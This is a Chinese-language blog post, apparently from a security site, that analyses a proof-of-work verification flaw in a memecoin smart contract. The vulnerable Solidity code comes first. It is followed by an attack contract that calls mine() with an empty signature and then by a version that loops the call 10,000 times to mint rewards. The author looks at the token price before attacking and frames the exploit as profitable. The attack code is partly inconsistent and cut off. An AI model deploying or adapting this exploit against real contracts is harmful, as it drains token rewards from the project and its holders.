PoW 验证机制漏洞攻击

2024年4月10日10:33:22评论20 views字数 1972阅读6分34秒阅读模式

一只土狗的合约部分漏洞源码

PoW 验证机制漏洞攻击

    function mine(bytes memory signature, address nonce, address recipient) external {        // Verify PoW        require(verifyPoW(nonce), "Invalid PoW");        // Recover the signer from the signature        address signer = recoverSigner(signature, nonce);        require(signer == nonce, "Signature verification failed");        // Mark the nonce as used        usedNonces[nonce] = true;        uint256 mintedReward = getCurrentReward();        _adjustDifficulty();        _adjustMiningReward();        _mint(recipient, mintedReward);        emit RewardFound(recipient, mintedReward);    }    function verifyPoW(address nonce) public view returns (bool) {        require(!usedNonces[nonce], "Nonce already used");        bytes32 hash = keccak256(abi.encodePacked(nonce));        uint256 target = calculateTarget();        bool isValid = uint256(hash) < target;        return isValid;    }

该代码中存在一个PoW 验证机制问题，在 verifyPoW 函数中，虽然检查了 nonce 是否已被使用，但没有检查 nonce 是否属于调用者。

以上代码中并没有确保检查 nonce 的所有权，不是只有 nonce 的所有者才能挖矿并获得奖励。

攻击者可能使用别人的 nonce 进行挖矿，从而获得奖励。

在 mine 函数中，挖矿奖励是根据 getCurrentReward 函数返回的值发放的。然而，挖矿奖励并未随着时间而变化，而是固定的。这可能导致通胀或通缩等问题.

PoW 验证机制说明如下

PoW 验证机制漏洞攻击

我们就可以利用PoW 验证机制漏洞进行攻击

// SPDX-License-Identifier: MITpragma solidity ^0.8.9;contract xxAttack {    // 合约地址    address public xxAddress;    // 事件用于跟踪攻击    event RewardReceived(address indexed recipient, uint256 amount);    // 构造函数，接收 xx 合约地址    constructor(address _xxAddress) {        xxAddress = _xxAddress;    }    // 攻击函数，模拟利用 PoW 验证机制漏洞的过程    function attack(address nonce, address recipient) external {        // 调用 xx 合约的 mine 函数，传入伪造的参数        (bool success, bytes memory data) = xxAddress.call(abi.encodeWithSignature("mine(bytes,address,address)", "", nonce, recipient));        // 如果调用成功，表示攻击成功        if (success) {            emit RewardReceived(recipient, 12e18); // 模拟奖励收到的事件        } else {            revert("Attack failed"); // 如果调用失败，则回滚并抛出错误        }    }}

重点查看attack的调用

（关键合约名称我xxx打码了）

PoW 验证机制漏洞攻击

攻击前看下token价格

PoW 验证机制漏洞攻击

开始执行攻击代码

PoW 验证机制漏洞攻击

优化一下攻击的代码

启用循环多次攻击

在attack参数中加入for循环的攻击

        for (uint i = 0; i < 10000; i++) {            // 调用 xx 合约的 mine 函数，传入伪造的参数            (bool success, bytes memory data) = xxxAddress.call(abi.encodeWithSignature("mine(bytes,address,address)", "", nonce, recipient));            // 如果调用成功，表示攻击成功            if (success) {                emit RewardReceived(recipient, 12e18); // 模拟奖励收到的事件            } else {                revert("Attack failed"); // 如果调用失败，则回滚并抛出错误

PoW 验证机制漏洞攻击

最后提醒一下交易的gas成本还是要自己掏的

扫描二维码获取

PoW 验证机制漏洞攻击

记一次Druid Monitor漏洞日常渗透

HTB - nocturnal

渗透测试 | 某系统三连shell

2025年LLM应用十大安全风险！OWASP最新指南

election

当心你的 AI！使用 Replit AI 掩盖你的 C2 流量

HTB-CozyHosting 红队靶机三阶渗透思维突破：Cookie伪造+命令注入组合拳

【vulhub】 GoldenEye

MCP带来的新型安全威胁

一次有趣的前端加密对抗分享

发表评论

在线咨询

微信